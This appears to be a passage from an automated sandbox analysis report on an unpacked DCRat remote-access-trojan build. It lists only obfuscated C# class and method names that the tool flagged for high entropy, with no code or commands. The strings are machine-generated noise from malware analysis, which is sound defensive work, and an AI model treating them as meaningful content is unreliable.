              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, dCZaLq43G3e24QElXD.csHigh entropy of concatenated method names: 'b46ktZGAb', 'wEh37mdV7G1b3Ty191', 'bpD0iLFC6srr6It8Fv', 'Hc0SeaA8MeosNT4BEG', 'FIC7WK8uHTMRQ7cGdV', 'if8UxGoUV0YV12SyjV', 'j9qG87eYB', 'ArBbV4pN6', 'aiIKePb3Q', 'HlRwVPGL8'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ReUYoKOQ56dexA6oG2.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'PxvrgccYH', 'HtsxvUmo6TAc1LJfgeC', 'Iy6jE6mTfsOv2TjK85C', 'bNa8QAmrQT9xdubb5IE', 'o2OEbcm2EccEYIJF5rw', 'wm0Z9UmDd53SVv7WMBf'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, rjYXO1Xt7HXwh5cqqeY.csHigh entropy of concatenated method names: 'ISXGfM30dj', 'ig7GxKgUWP', 'BTHY9D31unHeMETIVYy', 'Rv2wEv3MFNm2vht8Rhx', 'Bu4vku33rAc7ilEbglB', 'QP8POI3cFFO0iJjgad2', 'TTkOmr3GXmfMNARc7Sn', 'KGtf0r305nG4V02Y8y4', 'uWLtBp37k5pvKaM5B8x', 'F7xfN03l6oQwAU1fbGL'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tp1VHAMlJ4NNAG3oSlG.csHigh entropy of concatenated method names: 'WFHbdbLjpw', 'QL6b2NnYqJ', 'YrUbDB5aF3', 'f2nbcdiIwx', 'WlgbPfWREI', 'qRLbBdrsuJ', 'E9sbZudlWA', 'JVjE3XGJZMAg4vUEoRy', 'UonqBHGj4hOMf2TWXSo', 'd7fFGGGZQGlMg2KjGk9'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, en8I1MJvnXbnluCgtB.csHigh entropy of concatenated method names: 'YxVYVlySR', 'wqFX7fO2n', 'VxIHFt53R', 'XWvuTJWjp', 'KQh5QMAxv', 'xIs6k5POS', 'ccr0QPoel', 'Io8yeta66LwTteBFGJA', 'kc8KvLaPo5ZaH9HU3K6', 'e9iqfkaMYCs4nO9wBIu'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, LF8f8kDR88y5ca079GD.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'vdVlyIcO6a', 'lfulUeauR7', 'r8j', 'LS1', '_55S'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, qPskceXmrixwxJjbNGH.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'V8I6VE3g1nJXMXDcnab', 'Pwv28P3SmEN7Hpe8xd2', 'A1V5Zj3sh0NcUtkf8Ky', 'sAioci3eYcfSWALgDpY', 'wdAlBR3LdmOHgfKWHd2', 'ULvxqa3iPo8yCLoRaue'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, NnXO6EXSUsBwIS3XxOE.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'XOqi6p4YECwlVHNubds', 'EK4wOD4Kl5rUTSIgGQY', 'XwqntP4E1GymDI3CP4S', 'iACoWq4q6aseTxUNBDj', 'wim2TV4FXnLEZI3XY95', 'dGo3Cl4A4XhaaCNy4af'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, feFamedYfxyCYds7cQ.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'YGTq3mOyXydscR02VlD', 'gIPflmOXChXfUp6tVVi', 'CVYw2ROv76UqDMXA631', 'W4g6IFOVU8d5FlTAg62', 'rk7OCROzAkA4wJxachZ', 'vfBDQof5eAbFUj21ZB2'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, qPKTHmm9orwIlGudmS.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'DCx7QfHKu4OLc8hvDcu', 'Am1lvhHEMyQKo7BGfmu', 'gO8EePHqgeUpMLYbD3M', 'Fu5NCBHFQQf2IwrgMGT', 'bxdi6fHAjWs6x6CX2DN', 'kpvJF9Hd7PKaMdIQkMS'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uJqfieXFIghvENbe8e8.csHigh entropy of concatenated method names: 'k1hSt6VImW', 'LbxfkIMr5yPBEXvTq3B', 'KGmfh9M2u1BmCOxFNKJ', 'J3TngTMoPcWVd1c0b2b', 'YjARhIMTV2f4swVfHRE', 'SU9Ay2MDbqloLpArqb3', '_3Xh', 'YZ8', '_123', 'G9C'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, i0puI4Xp3qt6CQH4YxG.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'XL7ghn6o9eIkpdPmGLJ', 'v0sQdR6TqCNlpZr9Jfi', 'GIdZ1s6rP1rPOgBHuCb', 'ptKEBs62Glg12Q3xM4t', 'gcwMsv6DWorrhEDD0gl', 'Hm1hR36tqlxPE4w5YUM'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, pD0hMnMaSpk8HN57u9o.csHigh entropy of concatenated method names: 'EH5bzkRYua', 'ImAKTvPwv9', 'Ya7KSGRImM', 'HrrKGVkL3A', 'jOhKbh4LTp', 'AHiKKFGYkL', 'NyZKwA0dxP', 'X4lKebcDoM', 'hrmKWiEOXj', 'nC9KR1LJ0c'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, QFLqVS5PaWP8Gb60HvS.csHigh entropy of concatenated method names: 'nFWHOY8XNY', 'BFKHmRdUy7', 'GlGHQ1DogG', 'TVjHJAmFvV', 'QoeH9iyu8y', 'mgo77WtXAN9bVcgEhp9', 'uqcj9ktvwqAhsSWG4JE', 'otnvI9tVpgw23j7PfNs', 'qNm8A4tzebk1QYkMsGQ', 'UY2mfWb5ImtoV79CQ6U'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, CKFSINM76vVq76E8chw.csHigh entropy of concatenated method names: 'MmFWXWdXe4', 'MjNYfPUStTvltS2CH7h', 'ttZPBdUCdvsK6S2ZXLk', 'DKSWoLUg9qFlNTkfoXw', 'hGKCBOUsdBMIqCCV0q7', 'yUhw1JUe7Qeesw130x4', 's5eWLvAAsN', 'lekWC1nGwA', 'ekrWOK20C2', 'rF3Wm5xTA9'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, obhmbxMd7KOfTiSDKTh.csHigh entropy of concatenated method names: 'yC7eRP6pOU', 'Gg2eF2CB69', 'mC3XkCWilx0KntRqZEW', 'glbhDtWygYUD1NL9Sek', 'jxwGUbWeeQ41otjW3rR', 'mfPXJHWLQOn1PyaPNN8', 'cFMe3GAdE4', 'gpLZx8U5I3ZLubdCC0p', 'LGpo8jUa7DVvvPxIVRm', 'xSl36qWVNR5mue29TaT'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, n75vDiDCEN2dLk9ZHh0.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, oPLvoJrEpe9xPPokXMK.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, N0ZL0jrWWfceRYrduTr.csHigh entropy of concatenated method names: 'HpxXKPwCQv', 'OemXw6yjcw', 'LRcXeK6bu6', 'aAWXW9sZ09', 'mEeXR9ORSD', 'HBcXFK4mUP', 'rpBXit76I7', 'zgNXfSxwKR', 'XVbXxjI6Ox', 'iDYXgrcHpq'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, frrJupkSmosdxLocHUR.csHigh entropy of concatenated method names: '_223', 'rf8DkkQWGmysf7NdrNi', 'Gy1ECTQUWkoClmjQgwY', 'E7F9OEQNNAFEU0osmYF', 'WPsWaZQxJwTMmwNHk9D', 'avLX0IQQ18byRowSfj3', 'CtgseSQ96PnQjkJeCu0', 'oDUQd6QjVleCqFCJCud', 'sdHlVyQZXiuHuwh1jKu', 'hcHEw2QJ5V5JV22bFIi'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, zsJx2m5VH3sr1ufsdeO.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'fV00FTpAsX', 'ydp0iQBSky', 'A2E0frISXW', 'EC9', '_74a', '_8pl', '_27D', '_524'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, cHU5Gukm0GCCGa2f6F7.csHigh entropy of concatenated method names: '_269', '_5E7', 'lEaGrjxerf', 'Mz8', 'XlWG33CjyM', 'LM4cWaZs6SOOT87Fv5J', 'DuXLy6ZeWEwSjpmcdfX', 'UEtRK6ZLDVv2TcBudro', 'V8N2Y8ZiDvMVXWZK63Z', 'p5mVd4ZyW4fmse5dvJB'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, NO97mGXPMbHRGZxQaFA.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'koHYPK6JJMZvepDOGEx', 'Wsamyc6BJMB1ByBQMre', 'zFi7yV6ns0R6WZIBcWv', 'qFcOdH6YBfdWJt7gchD', 'MQKnvg6KZ6nFWd5yvBG', 'lg4CGv6EQRlNEmWDqaA'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, a75LDG5iWX2UXuyn4PO.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, UtIu7cXip8x48vme9aw.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'p3Udd96Vauibh2sflIe', 'GMDv4s6zn4oxU9omEje', 'MRrSFVP5rIepLmL6IIB', 'PlZwd9PaXgP3dUFGwk2', 'YjpTFTPmgOurWVCupxP', 'DTYs4FPOd3uQtYEPRgV'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, RxNhJUX2wVQDPVqKhTB.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'gyltxx4NxXMvy0shpqm', 'erxs8T4x1tekLwqR0TP', 'edbmEj4Q6PYpI48u4oE', 'mvobGH49EHcc8YlkSUy', 'ngx8Kr4jmjifbS2ho84', 'lcWFkW4ZkeaXFMaTmUo'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ac7WH95UvuBd3LGJiGL.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, MnkY9kXrawIUFk0neBy.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'pa1UBtIpGJJWxQh45ia', 'qtxmEYIhH0Dk6rBWNU4', 'jYNZPTICkbXOYPSZKlb', 'nBhSWiIgt7GThcLJ452', 'OUnkrVISG84FHro0My9', 'LfXcMKIspwA8O5ujmRe'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, g9m6KQXbMqnUXlHgurF.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'vqQ50w6577CLglyqQnm', 'N7TBj26aEOXxuBjYKaK', 'zWxrZj6memAfA7tRQSk', 'oxXloB6O5ApvIwKecPA', 'n3S91p6frX5A8itDh9v', 'QuehVV6HIV2kOOtvcah'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, fj489oMfawRYiVEqp9g.csHigh entropy of concatenated method names: 'eoZbI6UFwk', 'Y5qLEv0OHFGsQbfan0K', 'hZ4QoG0fNjeX3bZda72', 'xC9h4I0awK3c4olDM28', 'CwugtT0mjUH8epc1REW', 'pYWEG50HYrHxUmeNAHA', 'FtBg4B0IT4sMMQ4L6nR', 'sbK4BI04iQb02i59Fhh', 'BWYdjK06Du7ghmR2A6r', 'MQ7P8D0PXts1JsePWoH'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, qTPb4AXjt1OIWelh5jF.csHigh entropy of concatenated method names: 'I3RSMTPTbN', 'OAyd99MJWV1RSyv5ZYB', 'wnMfVMMB6EpIov1JjNH', 'fCj2qQMjrRgObAy9YqY', 'QN2qclMZ3sFLBZilRFJ', 'VgPYUQMnapn8FVFxNZe', 'QLw', 'YZ8', 'cC5', 'G9C'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, mlMyl0kVxeZ8wvyTBpO.csHigh entropy of concatenated method names: '_5u9', 'UWtG1Ud0SF', 'XRmiTCs3lF', 'nunGNP0eJV', 'FuHFZxjXP8tdwmASCl7', 'hXjirSjvQ5cpHcysxEo', 'MHPrqKjVQ2Dl1ve8lYO', 'o23EZkjiZwEnIcmSonr', 'ACbxdFjy2QXeUl8Cqvk', 'ANaiHAjzTVSHTdKhDxj'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, UmMYin5p1p0reIKFPZO.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'LWYHYLXcDn', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, osLxLH55SPrmOauDYlb.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PVStjT4hn5scdS4lfYS.csHigh entropy of concatenated method names: 'zennxapns0kgYECEyXU', 'IDSbeupYd10gm1gHI2H', 'Hdi5GJpJUtZadn3F7Ps', 'kwJqBNpBR3UQM5IjmCn', 'NyNjlWWMpL', 'rXdQbCpq5PDENGbQRfp', 'zY2SfhpF2w6lTfk59cA', 'QtJ0dKpA4yPdMI4orFR', 'HcXBANpde69lcrNrQej', 'RDAjOmp84UZbZexSDNS'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, CM4kAN6rt2XyLtJnvw.csHigh entropy of concatenated method names: 'XhhD68my8', 'bTfcdG2kw', 'VCjPOSZbl', 'fIb0XUa2PNKN7n30qdi', 'MjxBECaTZRMmWARPnOu', 'kN2PFsareqCyD1xqQCT', 'rGL3tfaDk5qHTjSjpS9', 'X4h22xatN9drIPERMPs', 'WGliUjabVRkKSAZIFlP', 'aWCcOQau8Q90rVG1kZV'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uoxBGjMjKvrMiFQ2XTW.csHigh entropy of concatenated method names: 'tRpw0fqXCI', 'OktkiswvPjn5Rhp4iL4', 'y3APjGwVmFABZctNXvq', 'Om14wVwy2llYKH7bjbo', 'fX4JwtwXAEEfIqetWVf', 'yUNFVXwzRG7SmHdvGgP', 'TdwS93W5pcam6XKbAkd', 'gnjFvAWaUwjvcrHCkJd', 'UH1v9OWmmWSxuYq1IL9', 'c8aBMTWOZ7W3r4rMgXJ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, AbyF6Y5ccPaRSV6vWJu.csHigh entropy of concatenated method names: 'bHCuFkiX6R', 'olquiexRZV', 'LocufcjKwE', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'dRouxKu5l7'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, TIXglEXlBKhU9Q9nv23.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'cyaYqc44gHmGph6oXwB', 'CMsSf646BQP5OtIVkMi', 'HjklpI4P9hZrdO81ooH', 'nm8Hqg4MEhQU5U840XH', 'Gronp743Jcjgn420asF', 'W13ltG41vFAvB20m1MZ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, dWejQuXfi0XPOmmXSRA.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'IfxUbs4DcXQq4yxvWe7', 'inCr4I4tMuCFpYaPhXn', 'tQ5erm4bSchQIWRfbIo', 'utPMxm4u7Bt1hFgbCeF', 'g25p7R4RCb3TPlwHMEG', 'ODqbiq4kwv9u4GYXrEt'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, nUM0x3rkhJ5uxCKcnJJ.csHigh entropy of concatenated method names: 'naAxiodjbJyJRmCcJ6H', 'zg1wnjdZcg30VwvUn5D', 'l3TgmqdQKALkYgFZFum', 'v5kUr0d9neaxkS3TBik', 'fRBOYwFPQ3', 'uBlC25dn1n1CaZ9QmUa', 'qog9J8dYM37TiHAFTdZ', 'qbxuMUdJdlYWrQM9Jee', 'CxNFGHdB0esYdageIAT', 'mt5GRGdK3lDVTaifZib'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, oHajG1kfAgYJUeXXET1.csHigh entropy of concatenated method names: 'l1fRraTj8P', 'DNsRsy2qWw', 'RtrRNqXaiG', 'mOQRnj0loD', 'QK7lEOQ8DZlZ7D5mOhE', 'O7HKoeQoG0fpwgTjTHe', 'oXim4wQTDRY0HlOyOvD', 'g2GEuEQA2LRYC7KpRML', 'gBHkxcQdYrVj3d0iW6J', 'jwHhyjQrTfNAxyFo4cH'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, feCK3kkzDZ70xu9KtFd.csHigh entropy of concatenated method names: 'NCbi5vJ4mV', 'W6fi684QSC', 'M8li0lSxw1', 'kU3YmwJbJqaKp62mZ2E', 'nBfeMsJurQ8BeEtH74A', 'E0AB5UJDKqBsT3wtFSp', 'fFOcF9JtrguTfNa3I2d', 'IVhRB3JRXNCUi07oanp', 'kEevGHJkJi6i6xuTX9a', 'wuZRYBJp6NjxI3QtJvN'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, csvTTBDe7UV0o4HHj3K.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'BuIkTRLHIu', '_3il', 'fGZkSSXVe9', 'R7HkGKwq8W', '_78N', 'z3K'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, EWcsSUr0fAoCVl1wmAU.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'dIFX9wtMi4', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, fsZkwSZXHf0Xv0mVD5.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'Oql8cXH7LAmjP98KowS', 'x0ysf1HlKiEJO3deNNI', 'sgROWWHwAaFOCvowtm8', 'eJRxCiHWPDv1PMQwtbd', 'BP8BaCHUtIB0aSV6r41', 'lLX9hnHNHRnYTmMc5kF'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, StuS5UFYUNN3WcTAGg.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'yTA5UKOTJSeqoUSRwQE', 'eHxMjoOrKPqpg2kkd6L', 'tHc9doO28bp9WPvCVyu', 'VEBBPTODGQup8f2GYLt', 'DJlw3UOtCTfkjKsJKow', 'Lp4VVeObshiWvOiWerR'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, nvHsMUGWsdX0G3LO0P.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'xFWXvcm3BHRuPbcvti3', 'EySrKOm1UZShrk0XtGy', 'fkySKwmckuH44Vwae3I', 'eA0l3fmGHdmFsvIjgwq', 'ly5HrKm0mcS0wgf9o4m', 'EQOC1Gm7EyT6XpvO3kk'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, V8JCbEk9AccBknpBX1p.csHigh entropy of concatenated method names: 'NC1R2LKK6r', 'Ev5RDLyTB9', 'IUkRcLFwVk', 'iIYWErQ0teIJccwt6hR', 'HZeSyKQcemZSfKSpRps', 'CfQRMjQGwhytemtCSGJ', 'gMoHAHQ7qeYYPjFjO1X', 'NVpRytBwSt', 'UMuRU5rvCI', 'NGKR3yjCtM'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, lOkbQbBb0NfPWduKuZ.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'EZ6dhlmvqq9GG96Wpx1', 'BpkokymVojm7NBpxKOy', 'lXxDffmzuRgcNbj9RNx', 'ukMTCIO5aeG0kBJVABD', 'nJ2gnUOa0T5M4HAJkLa', 'vZA6XpOmGGO1hi50qml'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, FUvTB8XuAIE6KpJsY4R.csHigh entropy of concatenated method names: 'BefSNVSem8', 'EqlZxaMm0WqmvifengF', 'h4wD2pMOOwjOfoFVotU', 'xkEvejM5OeNjqnfLaRq', 'dsOMUrMaC54hw2fcmQd', 'B0KVKTMfjBhru3mXOUg', 'toA0KiMH56UW8awX31I', 'F8gNrRMIAAYhn86xVQm', 'dQ0SEpqDyt', 'OsoZ6RMP0S8psSloYfk'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, jxUFL6rQt3GR0sxiYTL.csHigh entropy of concatenated method names: 'AYGYAKZenm', 'TIrYMOEeIL', 'Ic6Y1EBWiT', 'Y0JYIU8ZsO', 'Fk7Ya2y5cI', 'QKYYtEEuX3', 'gmju8OrCNplKkQgCTf5', 'cYNyvArpAwgWgToirKF', 'l3UnQ0rhEKf7SCqxMhj', 'ejyQhqrgrOeqX9MfHIN'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, gxlrpek1LvGoYoBLo6h.csHigh entropy of concatenated method names: 'sg9', 'bZ1G5YLGSg', 'wyxFtydHyD', 'loOGpZRDcv', 'nI3onRjCVIhSrqcmBqJ', 'lxKnfMjgtJ3wk4d2sA9', 'vmRpWDjSane75GQFNv2', 'goD72QjpvgusU3qTXx3', 'bCDGWKjhelJZKegbbsM', 'Q8VcMEjsb2OHqmcylMp'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, MTJPGvHNe9SAZAXfcK.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'BqK4hu3qM', 'chxPjRmNaj7BlMQxeeX', 'dUeau1mx2OfKUujpr1h', 'fu2u5RmQyOsNtVmO3vg', 'GKq1Skm93xrM2CT7s8G', 'IetaQPmjiuPBlafPsC2'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ikXWGe4UA9BrWQEbsnG.csHigh entropy of concatenated method names: 'ibIjYD8vpq', 'OtvjXth9sU', 'H2CjHNVbiY', 'IVXjuM4e4A', 'LlQj5eh1u3', 'rXMj6IKTlX', 'w6Zj0NrXlp', 'gbbjvrDwDU', 'vfXjjN1TMt', 'jEojdo4Ykv'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uZ0L4x5Hfw6UKScHjWP.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'NZNuXBaZH3', 'HA2uHS0u9T', 'pvcuuJMb7N', 'w75u5DP9pl', 'nNIu6CWViJ', 'Venu04Kcjp', 'YcT0EuurW7Z5pjO8KJy'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, OJZPS1kZg5X8hT0kG6M.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'HgWifOVYc5', 'nOCGsp0COO', 'BPOix6JvR8', 'lJMG2m3Tse', 'I7oIS7Z232TD1L3nwGb', 'sJag91ZDxgTveZvm1pG', 'iLsUSXZThLdkHHdL8E3'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, LM6iZlrc3Q8eNxGK50m.csHigh entropy of concatenated method names: 'zaeYsMFgRk', 'XXiYNJlrvy', 'OOVYnyP0vI', 'CnFWjJroeIf8bjIkBP3', 'VxqMDlrdYr5ps40e2gU', 'DJQqSgr87FwcLA2gA9L', 'CLpJAJrTTN8XV0I95vi', 'Ejnb54rrKpkI2mv2ouM'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, kGWL5KDSskg6lsJK6ms.csHigh entropy of concatenated method names: 'JJwxcrm7uM', 'NarxPLRLSq', 'foNxByZNE2', 'YN0xZP6dTM', 'tACx4fFvJH', 'SpQLNCBV0dSDXRPtxpZ', 'EtRMNrBzyJYM0xbMLc3', 'GM97B5BXRFXYvq4TYwM', 'kuaTtVBviEfWQTexKS3', 'BxsTeyn5pmxKOxrK4Li'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uD1CEWXcCe05jYVwLlt.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'sJbbV2PTd9lw7kmcXcf', 'pBPLgvPrUGolZtICfYL', 'DVq9U9P2tKYY5ZKhqGL', 'HmRXcCPDIF9fQ82lCTW', 'AFpk4bPt90yQ5KG8FqR', 'euIAfJPbAvGwQsuUabc'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, KyOTmgriHr2hnFRE7We.csHigh entropy of concatenated method names: 'dFjYZU8M0l', 'Tw5Y4RX1Ow', 'TeoYVur8xX', 'aOsYopxaj2', 'WgtYr7lEkZ', 'iwBllprKJ0nmGABStXO', 'rcqMYkrn3vV39EsJh57', 'nKtBknrYgMGmwIU9eNB', 'ttOIS9rE4iHEKsn4c9T', 'b51YgCrqaIAXJuX4JCo'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, dshDBGXU7CTxFAQ7LDy.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'UqSAn26hIeiWumHmUBg', 'BDNKpN6CDAdSCDxoYg1', 'GMRXxE6g3mNhaeQ6O7q', 'jEejwo6S03EeFIASZJ7', 'G891ka6sQO3nxf13vOi', 'ikDPLe6ecFxd93MfwVq'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, Cgq2kvzosEAKCPyPAH.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'LFElhQIO4TyZseuaabr', 'miirRgIfHHUcSfONAiW', 'OLZXc3IHYj0o99osII6', 'DoS34iIIDGi86AoriD5', 'BqbvoBI4IOulXHJdqV8', 'agPVhEI669AQbmvxnui'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, GDQqU3XvsenXvHLY6L0.csHigh entropy of concatenated method names: 'aKHGSKjCGI', 'U7wGG60rol', 'wIhGbqF00I', 'zE0gIpMsp1GJNWQTfb9', 'BiMaa2MeLSdPFisOULb', 'e72fBJMgULsnDUR036G', 'j4RRIjMSaAExUSybLPk', 'atnSK3ML3rmi08lhx69', 'vDYrMPMiMYCEoAWkroe', 'TirSG3MyetO7RHV5xTH'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, eiKljD5OouuANgNXZMt.csHigh entropy of concatenated method names: 'aEjQAORfXTN5S7yjuEU', 'MRAkIhRHeJB0bdcQhnX', 'oy3HS0RmJWQZcYHAhCd', 'IRFVbuROCN9rK38XY5P', 'HxmuDUeyii', 'WM4', '_499', 'PNOucrvbDy', 'BEVuPw9WKO', 'RaxuBHVbam'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, Oerw6JMJ8naxclaQ7Wt.csHigh entropy of concatenated method names: 'k8FKmB5qJt', 'b7NKQb5MGD', 'R3aKJ3u49p', 'CLZK9STSgB', 'JeHKYlx0LP', 'JDt3Cnl5HtuVTTFJLsS', 'Nt9hUulaWQRCiTbuViW', 'xDPHtG7VJd5g7oWRnVp', 'eArFiF7zkTrofasD8aK', 'YHN2EflmYh0IsAbxgid'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, R7jPP7ImnklP4rRFTd.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'hnMETjHItvYbiaLlYDV', 'Ef8hF3H4F0L4wHGGS3I', 'Lg5IKTH6OWLrn6sK4Yn', 'UnywjKHPIlwXys8n2n2', 'YC9strHMmurs6kxuPKq', 'KTx4UJH3hoajiFMSPOt'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, qtGSCFtKy5HjO36b70.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'jLRxEYfRk6ZRYw3EXxC', 'AYt4IEfkMRcw18mGZvW', 'kkNJuLfpWTscvgZhijK', 'SFoNMGfhG4DyAPa2gRj', 'iV3OmafCTqoBwEUJRiw', 'cIdceCfgJMVcjqXkfuC'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, n0pvB6kIpyvFRJXXn7k.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'N2TGuQXamJ', '_168', 'LXqI3CZBabtGkBnCwk4', 'YPKVP9ZngfkKnPydbqO', 'hjXfsDZYW8jMJNdFPwS', 'WuP2RrZK2nhUWUsAQ94', 'we7nvLZE8KgQ4pmsxNZ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, nhfg4RkyLVj5ML4FnpW.csHigh entropy of concatenated method names: 'fcqRqu9D7v', 'rvsRpuw3vT', 'SZlRhMv1ro', 'N6xu3DQpQqC5Fu9HoMU', 'fyQ4fkQhqnyKnhdOqS6', 'kJ5O7pQCaZcSZFZIdoL', 'WSPUenQgYYiWnKZuCV2', 'agDLM2QSLGFPXE5OgAM', 'oFDQHwQsVXci4Xrks1k', 'm6iZ3RQeScPEx0PZVmj'
